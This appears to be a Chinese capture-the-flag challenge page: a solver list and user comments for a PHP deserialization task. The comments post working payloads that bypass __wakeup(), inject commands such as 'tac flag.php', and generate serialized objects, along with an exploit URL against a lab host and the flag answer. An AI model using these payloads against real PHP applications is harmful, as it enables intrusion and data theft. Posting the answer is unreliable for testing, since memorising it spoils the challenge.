评分(3)
解题动态
wangjf 攻破了该题 1小时前
ほしの) アイ 攻破了该题 3小时前
zayxshawn 攻破了该题 2天前
死在回忆里 攻破了该题 5天前
xxxx3803 攻破了该题 8天前
森屿暖阳 攻破了该题 10天前
19554517129 攻破了该题 10天前
Lixxxxxir 攻破了该题 10天前
zy20041008 攻破了该题 10天前
abc_ 攻破了该题 10天前
18315400384 攻破了该题 10天前
1665487923 攻破了该题 10天前
2662212567 攻破了该题 10天前
eren 攻破了该题 10天前
wkb123456 攻破了该题 10天前
3294055740 攻破了该题 10天前
killminebug 攻破了该题 10天前
wwt111 攻破了该题 10天前
15762905283 攻破了该题 10天前
评论
Bojing 3月前
举报
有哪里提示了username是admin的吗
numberone 1月前
举报
源代码里不是有个if语句:if ($this->username === 'admin')
18956160518 4月前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
EtHat 7月前
举报
O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
xht0525 9月前
举报
nl flag.php|base64
不会编程的崽 10月前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 10月前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 1年前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
wxy1343 1年前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}
wxy1343 1年前
举报
flag{Unser1alize_and_2CE_Add}
yuanyipaceandlove 1年前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;